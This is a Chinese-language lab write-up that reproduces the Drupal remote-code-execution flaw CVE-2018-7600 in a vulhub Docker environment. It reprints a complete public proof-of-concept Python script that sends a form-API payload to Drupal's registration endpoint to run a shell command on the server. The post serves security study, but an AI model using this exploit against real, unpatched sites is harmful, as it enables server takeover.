最近打的靶場不約而同地都用到了這個漏洞
好好復現下,主要針對的是Drupal的cms框架
漏洞環境搭建
主要利用vulhub漏洞靶場的環境搭建,建議docker配一個阿里雲的映象加速器,不然的話拉取映象的時間會很久
在/etc/docker下建立一個daemon.json檔案
寫入
{ "registry-mirrors":["https://6kx4zyno.mirror.aliyuncs.com"] }
之後使用
systemctl daemon-reload(過載檔案)
systemctl restart docker(重啟docker服務)
發現使用docker-compose up -d命令可以迅速搭建好漏洞環境,一般在半分鐘之內
啟動docker容器
訪問8080埠
安裝完成
漏洞利用
1 import sys 2 import requests 3 4 print ('################################################################') 5 print ('# Proof-Of-Concept for CVE-2018-7600') 6 print ('# by Vitalii Rudnykh') 7 print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') 8 print ('# https://github.com/a2u/CVE-2018-7600') 9 print ('################################################################') 10 print ('Provided only for educational or information purposes\n') 11 12 target = input('Enter target url (example: https://domain.ltd/): ') 13 14 # Add proxy support (eg. BURP to analyze HTTP(s) traffic) 15 # set verify = False if your proxy certificate is self signed 16 # remember to set proxies both for http and https 17 # 18 # example: 19 #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} 20 #verify = False 21 proxies = {} 22 verify = True 23 24 url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 25 payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'} 26 #傳送惡意程式碼 27 r = requests.post(url, proxies=proxies, data=payload, verify=verify) 28 #驗證 29 check = requests.get(target + 'hello.txt', proxies=proxies, verify=verify) 30 if check.status_code != 200: 31 sys.exit("Not exploitable") 32 print ('\nCheck: '+target+'hello.txt')
發現在網站伺服器上的確存在hello.txt(說明程式碼已經被執行)
參考文章
https://blog.csdn.net/qq_51295677/article/details/131975245
https://blog.nsfocus.net/cve-2018-7600-analysis/
https://xz.aliyun.com/t/2271?time__1311=n4%2BxnieDq7qCqAKDtKDsf32r7GO7DgD3oggYD
https://paper.seebug.org/567/